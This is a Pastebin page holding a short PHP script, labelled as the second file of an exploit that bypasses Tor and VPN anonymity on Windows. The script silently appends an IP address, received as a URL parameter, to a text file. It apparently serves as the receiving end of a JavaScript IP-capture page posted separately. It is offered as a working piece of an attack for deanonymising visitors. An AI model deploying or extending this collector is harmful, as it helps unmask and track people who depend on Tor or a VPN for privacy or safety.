Advertisement
Googleinurl

[EXPLOIT]2=> SCRIPT EXPLOIT BYPASS TOR/VPN WINDOWS - FILE02

Feb 1st, 2015
1,803
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.81 KB | None | 0 0
  1. <?php
  2. /*
  3. SALVAR IP CAPTURADOS COM JAVASCRIPT
  4. FILE01 = http://pastebin.com/2u55h7Dj
  5. ----------------------------------------------------------
  6. *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  7. *EMAIL*: inurllbr@gmail.com
  8. *Blog*:http://blog.inurl.com.br
  9. *Twitter*: https://twitter.com/googleinurl
  10. *Fanpage*: https://fb.com/InurlBrasil
  11. *GIT: *https://github.com/googleinurl
  12. *PASTEBIN: *http://pastebin.com/u/Googleinurl
  13. *YOUTUBE: *https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  14. *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  15. ----------------------------------------------------------
  16. */
  17. error_reporting(0);
  18. set_time_limit(0);
  19. ini_set('display_errors', 0);
  20. ini_set('max_execution_time', 0);
  21. file_put_contents("ARQUIVO.TXT","{$_GET['IP']}\n---------------------------\n", FILE_APPEND);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement